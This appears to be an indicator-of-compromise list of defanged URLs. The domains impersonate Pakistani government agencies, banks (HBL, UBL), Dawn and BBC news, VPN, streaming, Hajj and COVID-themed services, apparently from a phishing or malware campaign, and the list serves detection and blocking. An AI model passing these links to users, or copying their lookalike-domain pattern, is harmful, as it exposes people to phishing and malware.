https://islamicfinder.bitlyy[.]me/pk-e1b70bbf
https://islamicfinder.bitlyy[.]me/pk-06b9b2a6
https://islamicfinder.bitlyy[.]me/pk-197bb141
https://islamicfinder.bitlyy[.]me/pk-c54bf34d
https://sec-vpn.bitlyy[.]me/vpn-23ddadaf
https://sec-vpn.bitlyy[.]me/vpn-21bfb7b5
https://sec-vpn.bitlyy[.]me/vpn-cbc4086f
https://sec-vpn.bitlyy[.]me/vpn-83072541
https://sec-vpn.bitlyy[.]me/vpn-439f537d
https://sec-vpn.bitlyy[.]me/vpn-7979b16e
https://sec-vpn.bitlyy[.]me/vpn-15c17337
https://sec-vpn.bitlyy[.]me/vpn-926e5d7d
https://sec-vpn.bitlyy[.]me/vpn-008185f6
https://sec-vpn.bitlyy[.]me/pk-cd99f6ff
https://sec-vpn.bitlyy[.]me/pk-668466e8
https://sec-vpn.bitlyy[.]me/pk-0c86afbc
https://sec-vpn.bitlyy[.]me/pk-3a45c8d9
https://sec-vpn.bitlyy[.]me/pk-e70f3c46
https://pkflix.bitlyy[.]me/promocode-6307367a
https://pkflix.bitlyy[.]me/promocode-2dba24a9
https://pkflix.bitlyy[.]me/promocode-c25d3e35
https://pkflix.bitlyy[.]me/promocode-107a5bb1
https://pkflix.bitlyy[.]me/stream-7805d297
https://hajjplanner.bitlyy[.]me/pk-18e9198e
https://hajjplanner.bitlyy[.]me/pk-a735bd70
https://hajjplanner.bitlyy[.]me/pk-7419336b
https://hajjplanner.bitlyy[.]me/pk-b11fea5e
https://hajjplanner.bitlyy[.]me/pk-cfc50947
https://hajjplanner.bitlyy[.]me/pk-0c5a63be
https://hajjplanner.bitlyy[.]me/pk-9b87b943
https://hajjplanner.bitlyy[.]me/pk-4f0baed9
https://niims.pakgov[.]org/certificate-55202404
https://dha.pakgov[.]org/NewProjects-510f22c4
https://dha.pakgov[.]org/NewProjects-be9c5a2d
https://dha.pakgov[.]org/NewProjects-6371470f
https://dha.pakgov[.]org/NewProjects-d1ac5919
https://dha.pakgov[.]org/NewProjects-b6d8b123
https://dha.pakgov[.]org/NewProjects-9305ff41
https://dha.pakgov[.]org/NewProjects-f6496062
https://dha.pakgov[.]org/NewProjects-2e78115c
https://dha.pakgov[.]org/NewProjects-f3140087
https://dha.pakgov[.]org/NewProjects-65e4f722
https://dha.pakgov[.]org/NewProjects-8dff7156
https://dha.pakgov[.]org/NewProjects-1b68a7ca
https://dha.pakgov[.]org/NewProjects-edf6bc66
https://dha.pakgov[.]org/NewProjects-766dbc91
https://dha.pakgov[.]org/NewProjects-9c297b65
https://dha.pakgov[.]org/NewProjects-f9ab1c38
https://dha.pakgov[.]org/NewProjects-0c2e4a85
https://dha.pakgov[.]org/NewProjects-29434b5c
https://dha.pakgov[.]org/NewProjects-a6e8129d
https://dha.pakgov[.]org/NewProjects-b1b65dee
https://dha.pakgov[.]org/NewProjects-f1568660
https://dha.pakgov[.]org/NewProjects-d7338893
https://dha.pakgov[.]org/NewProjects-f536422c
https://dha.pakgov[.]org/NewProjects-aa07e293
https://dha.pakgov[.]org/NewProjects-37782aa5
https://dha.pakgov[.]org/NewProjects-2f292961
https://dha.pakgov[.]org/NewProjects-27c33f9c
https://dha.pakgov[.]org/NewProjects-56e2db33
https://dha.pakgov[.]org/NewProjects-a07e32d4
https://dha.pakgov[.]org/NewProjects-362801b1
https://dha.pakgov[.]org/NewProjects-93dc1e3c
https://dha.pakgov[.]org/NewProjects-b2a90e66
https://www.dha.pakgov[.]org/NewProjects-sa48djs
https://dha.pakgov[.]org/NewProjects-1s5er6
https://dha.pakgov[.]org/NewProjects-6e425227
https://sbp.pakgov[.]org/RightsAndResponsibilities-e48e7552
https://sbp.pakgov[.]org/RightsAndResponsibilities-1996eae6
https://news.pakgov[.]org/LatestNews-b0fed0c7
https://hbl.pakgov[.]org/CreditCards-ee080e1b
https://hbl.pakgov[.]org/CreditCards-29383fef
https://ubl.pakgov[.]org/DigitalAccount-11dd5a7f
https://hbl.pakgov[.]org/CrediCard-f8b49d40
https://dha.pakgov[.]org/project-b804c410
https://secp.pakgov[.]org/warning-996b72c1
https://secp.pakgov[.]org/warning-be11779e
https://secp.pakgov[.]org/warning-6c2c0eb5
https://secp.pakgov[.]org/warning-ad37753b
https://secp.pakgov[.]org/warning-4e50cc79
https://secp.pakgov[.]org/warning-fe34551c
https://secp.pakgov[.]org/warning-f70d4741
https://secp.pakgov[.]org/warning-3b657014
https://secp.pakgov[.]org/warning-05e910a0
https://secp.pakgov[.]org/warning-dd062b28
https://secp.pakgov[.]org/warning-221ba1f8
https://secp.pakgov[.]org/warning-78cafc7a
https://secp.pakgov[.]org/warning-94158827
https://secp.pakgov[.]org/warning-548414e2
https://secp.pakgov[.]org/warning-97a02fa1
https://dawn.pakgov[.]org/news-8da33068
https://dawn.pakgov[.]org/news-c1d62037
https://dawn.pakgov[.]org/news-4495645d
https://dawn.pakgov[.]org/news-330a5b15
https://dawn.pakgov[.]org/news-0b08d2f6
https://dawn.pakgov[.]org/news-3d656f53
https://dawn.pakgov[.]org/news-a8aa8f10
https://dawn.pakgov[.]org/news-946de614
https://dawn.pakgov[.]org/news-6175fe97
https://dawn.pakgov[.]org/news-6ac330d4
https://dawn.pakgov[.]org/news-bf180b0c
https://dawn.pakgov[.]org/news-a04f643c
https://dawn.pakgov[.]org/news-efee9995
https://dawn.pakgov[.]org/news-1b07c42e
https://dawn.pakgov[.]org/news-2545d573
https://dawn.pakgov[.]org/news-597bb915
https://dawn.pakgov[.]org/news-08e3a98a
https://dawn.pakgov[.]org/news-2848a3d5
https://dawn.pakgov[.]org/news-53b047da
https://dawn.pakgov[.]org/news-9a4c37db
https://dawn.pakgov[.]org/news-132f1f1f
https://dawn.pakgov[.]org/news-02c0bf68
https://dawn.pakgov[.]org/news-8f9e26de
https://dawn.pakgov[.]org/news-377f79d6
https://dawn.pakgov[.]org/news-de2c51c7
https://dawn.pakgov[.]org/news-980b36d8
https://dawn.pakgov[.]org/news-99bab94b
https://dawn.pakgov[.]org/news-f1580657
https://dawn.pakgov[.]org/news-cec0f274
https://dawn.pakgov[.]org/news-fd511b5c
https://dawn.pakgov[.]org/news-289fb7ba
https://dawn.pakgov[.]org/news-cddb5532
https://dawn.pakgov[.]org/news-f0feed54
https://dawn.pakgov[.]org/news-317cb7a1
https://dawn.pakgov[.]org/news-8d742716
https://dawn.pakgov[.]org/news-8280e2c5
https://dawn.pakgov[.]org/news-5c199b95
https://dawn.pakgov[.]org/news-6657df22
https://dawn.pakgov[.]org/news-d74121d8
https://dawn.pakgov[.]org/news-c5bd93b7
https://dawn.pakgov[.]org/news-02547f69
https://dawn.pakgov[.]org/news-a1226975
https://dawn.pakgov[.]org/news-45f51312
https://dawn.pakgov[.]org/news-c12d7c0b
https://dawn.pakgov[.]org/news-9a140d7f
https://dawn.pakgov[.]org/news-6df42707
https://dawn.pakgov[.]org/news-dd65b8e8
https://dawn.pakgov[.]org/news-7a1c5709
https://dawn.pakgov[.]org/news-1b0b28f1
https://dawn.pakgov[.]org/news-357d9f0d
https://dawn.pakgov[.]org/news-87a14e4b
https://dawn.pakgov[.]org/news-5bf773ad
https://dawn.pakgov[.]org/news-dd5cde6e
https://dawn.pakgov[.]org/news-97deb930
https://dawn.pakgov[.]org/news-ded9f716
https://dawn.pakgov[.]org/news-0fc5f12b
https://dawn.pakgov[.]org/news-a804ff04
https://dawn.pakgov[.]org/news-dec4a529
https://dawn.pakgov[.]org/news-878e2196
https://dawn.pakgov[.]org/news-66acfefa
https://dawn.pakgov[.]org/news-d262499b
https://dawn.pakgov[.]org/news-baface44
https://dawn.pakgov[.]org/news-77b97bbb
https://dawn.pakgov[.]org/news-0546aecc
https://dawn.pakgov[.]org/news-f45ad4d1
https://dawn.pakgov[.]org/news-8e979dd6
https://dawn.pakgov[.]org/news-b349ee73
https://dawn.pakgov[.]org/news-98c8083d
https://dawn.pakgov[.]org/news-938bd796
https://dawn.pakgov[.]org/news-6ffb3527
https://dawn.pakgov[.]org/news-6c2f2eaf
https://dawn.pakgov[.]org/news-53789c26
https://dawn.pakgov[.]org/news-940f6809
https://dawn.pakgov[.]org/news-4f856c15
https://dawn.pakgov[.]org/news-864772a3
https://dawn.pakgov[.]org/news-ac709a52
https://dawn.pakgov[.]org/news-fafd0218
https://dawn.pakgov[.]org/news-cf545933
https://dawn.pakgov[.]org/news-b3ca61ef
https://dawn.pakgov[.]org/news-4aa5604e
https://dawn.pakgov[.]org/news-e2a42102
https://dawn.pakgov[.]org/news-9d005c8b
https://dawn.pakgov[.]org/news-871d4b94
https://dawn.pakgov[.]org/news-49c7dcef
https://dawn.pakgov[.]org/news-5ddf5ec1
https://dawn.pakgov[.]org/news-65384754
https://bit.tin-url[.]com/news-af243a12
https://min.tin-url[.]com/cn-0e72f952
https://pkflix.tin-url[.]com/pkflix-be44173b
https://pkflix.tin-url[.]com/pkflix-575ae41c
https://pkflix.tin-url[.]com/pkflix-b3961530
https://pkflix.tin-url[.]com/pkflix-0608a384
https://pkflix.tin-url[.]com/pkflix-0508cbe4
https://pkflix.tin-url[.]com/pkflix-71e35ba2
https://pkflix.tin-url[.]com/pkflix-98ff1204
https://pkflix.tin-url[.]com/pkflix-94a9b697
https://pkflix.tin-url[.]com/pkflix-0b5a8c94
https://pkflix.tin-url[.]com/pkflix-26ecec9e
https://pkflix.tin-url[.]com/pkflix-171105e0
https://pkflix.tin-url[.]com/pkflix-9da99dc1
https://pkflix.tin-url[.]com/pkflix-8c1bec76
https://pkflix.tin-url[.]com/PKFlix-86ccfe62
https://vpn.tin-url[.]com/vpn-0bca7d09
https://secure.tin-url[.]com/vpn-c216f3cb
https://hajjplanner.tin-url[.]com/trip-687b5e5f
https://secure.tin-url[.]com/secure-f5bc0889
https://fdscv.tin-url[.]com/dxcv-d6144436
https://news.dawnpk[.]org/pk-9a6d7f1e
https://www.dawnpk[.]org/news-f811df60
https://www.dawnpk[.]org/news-4b3a3191
https://www.dawnpk[.]org/news-d76d3f08
https://www.dawnpk[.]org/news-fce44fe5
https://www.dawnpk[.]org/news-a208709e
https://www.dawnpk[.]org/news-a14dh7
https://vim.kdf-mail[.]com/vim-f758cc6f
https://news.kdf-mail[.]com/news-34526217
https://meet.kdf-mail[.]com/meet-9dbf6541
https://xyz.kdf-mail[.]com/1596-f35d483e
https://smstest.kdf-mail[.]com/147632-86182096
https://bb.kdf-mail[.]com/gg-866441c1
https://pk.kdf-mail[.]com/pk-1115ee89
https://covid.bbcnew[.]cn/cn-b3383258
https://covid.bbcnew[.]cn/cn-4e0e3900
https://covid.bbcnew[.]cn/cn-fd33d30b
https://covid.bbcnew[.]cn/cn-1b8b1a03
https://china.bbcnew[.]cn/covid-3f3e04ae
https://covid.bbcnew[.]cn/cn-c69c0d36
https://covid.bbcnew[.]cn/cn-8e5be8ac
https://covid.bbcnew[.]cn/china-ec369772
https://covid.bbcnew[.]cn/china-f4b5aa1c
https://covid.bbcnew[.]cn/china-1fcd28ce
https://covid.bbcnew[.]cn/china-3b19cc4c
https://covid.bbcnew[.]cn/china-c8ab4a5d
https://covid.bbcnew[.]cn/china-43839bdd
https://covid.bbcnew[.]cn/china-0b2a53ae
https://covid.bbcnew[.]cn/china-e309979f
https://covid.bbcnew[.]cn/china-e4cea820
https://covid.bbcnew[.]cn/china-7a19c324
https://covid.bbcnew[.]cn/china-315019d7
https://finance.govpk-mail[.]net/financecircular-38149cbd
https://news.pkrepublic[.]org/news-5ce12823
https://covid.pkrepublic[.]org/cn-2454d1ea
https://wsed.pkrepublic[.]org/refer-d6fb809a
https://jp.pkrepublic[.]org/jf-ed22e05f
https://paf.gov-mail[.]net/pressrelease-d516ffl
https://covid19.mohp-gov[.]org/vaccine-e6fe8d00
https://ministryofinterior.fileserve[.]work/notification-69c9c777
https://hpupdate.csd-pk[.]co/download-a4544ebd